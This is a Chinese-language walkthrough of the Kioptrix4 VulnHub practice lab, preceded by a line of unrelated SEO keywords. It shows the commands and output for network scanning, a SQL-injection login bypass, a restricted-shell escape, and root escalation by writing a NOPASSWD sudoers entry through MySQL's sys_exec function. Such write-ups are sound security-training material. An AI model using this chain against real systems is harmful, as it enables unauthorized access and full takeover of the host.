网站做cdn需要注意什么,安庆市网站建设制作,商品网站模板,知名开发网站公司简介目录 0x00 环境准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用0x04 总结 0x00 环境准备 下载#xff1a;https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar
解压后得到的是vmdk文件。在vm中新建虚拟机#xff0c;稍后安装操作系统#xff0c;系统选… 目录 0x00 环境准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用0x04 总结 0x00 环境准备 下载https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar
解压后得到的是vmdk文件。在vm中新建虚拟机稍后安装操作系统系统选择linux的ubuntu64位。选择使用现有虚拟磁盘选择这个vmdk文件然后选择保持现有格式。编辑虚拟机设置显示器中去掉加速3D。
0x01 主机信息收集 kali本机的ip192.168.119.128
探测目标主机的ipnetdiscover -i eth0 192.168.119.0/24
目标主机的ip192.168.119.142
探测目标主机的开放端口等信息nmap -sV -p 1-65535 -A 192.168.119.142
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:51 CST
Nmap scan report for 192.168.119.142
Host is up (0.00059s latency).
Not shown: 39528 closed tcp ports (reset), 26003 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:EA:3D:D5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2025-02-26T10:52:17-05:00
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 10h29m59s, deviation: 3h32m07s, median: 7h59m59s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.119.142OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.12 seconds 开放了22端口ssh服务OpenSSH 4.780端口http服务Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4139端口smb协议。Samba smbd 3.X - 4.X445端口Samba smbd 3.0.28a系统内核Linux 2.6.9 - 2.6.33。
0x02 站点信息收集 先访问80端口 这里是一个登录框可以先试试万能密码再试一下弱口令看看有没有sql注入之类的。
尝试弱口令
账号admin
密码 or 11登录成功进入另一个页面url的参数里username是admin 探测开放目录dirsearch -u 192.168.119.142 有个sql文件查看一下文件内容 可以看到这里有一个username和password尝试用这个用户进行登录。提示错误登录失败。想到前面以admin用户登录成功的时候url中有个参数指明了用户名把那个用户名换成john访问一下http://192.168.119.142/member.php?usernamejohn 显示的密码是空的抓包看了一下内容确实是什么也没有。想到前面用万能密码登录这里试一下把万能密码的用户名改成john登录 显示了一个密码。这里退出来用john和显示的密码进行登录也登录成功了。
0x03 漏洞查找与利用 前面探测端口时开放了ssh协议22端口。尝试用 john和 MyNameIsJohn进行ssh登录ssh john192.168.119.142 我这里报错了查了一下是因为我的SSH 客户端不支持服务器提供的密钥类型ssh-rsa 和 ssh-dss。这是因为现代 OpenSSH 版本默认禁用了 ssh-rsa 及其他过时的密钥算法。可以加个参数 ssh john192.168.119.142 -o HostKeyAlgorithmsssh-rsa
尝试了常见的命令都没有回显来获取一下交互式shell执行命令echo os.system(/bin/bash) 查找一些敏感信息在/var/www目录下的checklogin.php文件中找到了一个数据库的用户名root密码是空。 直接连接数据库mysql -u root
查看可用的UDFselect * from func;
在查询结果中有个 sys_exec利用这个函数给john用户添加root权限
select sys_exec(echo john ALL(ALL) NOPASSWD: ALL /etc/sudoers); 执行成功后就会给john用户添加了sudo权限并且不需要密码。
退出mysqlexit
切换成root用户sudo su
获取flag成功 0x04 总结 主机信息收集
netdiscover探测目标主机ip。nmap探测开放的端口和服务。
站点信息收集
扫描站点目录。根据探测到的数据库文件获取其他用户的信息。
漏洞利用
万能密码登录后台。获取账号密码。ssh登录获取到的用户。利用mysql的udf进行提权。